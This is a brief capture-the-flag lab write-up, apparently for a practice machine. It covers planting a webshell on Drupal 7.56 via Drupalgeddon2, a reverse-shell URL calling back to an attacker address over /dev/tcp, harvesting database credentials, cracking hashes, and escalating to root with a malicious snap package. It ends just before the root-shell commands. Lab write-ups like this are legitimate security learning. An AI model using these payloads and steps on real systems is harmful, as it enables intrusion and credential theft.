Doing a detailed scan reveals that port 80 is running Drupal 7.
Drupalgeddon
Because this was running Drupal, we can directly head to the CHANGELOG.txt directory to view the version used.
Drupal 7.56 is vulnerable to the Drupalgeddon2 RCE exploit.
We can use this to easily put a webshell on the page. The exploit would put a shell.php file on the webserver that takes a c parameter for the RCE.
By going to http://10.10.10.223/shell.php?c=bash+-i+>&+/dev/tcp/10.10.14.9/4444+0>&1, we would get a shell.
Privilege Escalation
SQL Creds
Within the Drupal configuration files at /sites/default/settings, we can find a password for the SQL database.
With this, we can login to the SQL server and enumerate the database. By dumping the users table from the drupal database, we can find a username and hash.
Hash is easily cracked with john.
Then we can SSH in as the brucetherealadmin user using this credential.
Dirty Sock
When checking sudo privilges of this machine, we see that we can run snap.
By checking the snap version, we can see that this is not vulnerable to the dirty sock exploit because it is updated.
However, because we run snap as root, this means that we can create a malicious snap package to be downloaded, and the imported package would run the dirty_sock exploit.
The exploit can be found here.
We can then run these commands to gain a root shell:
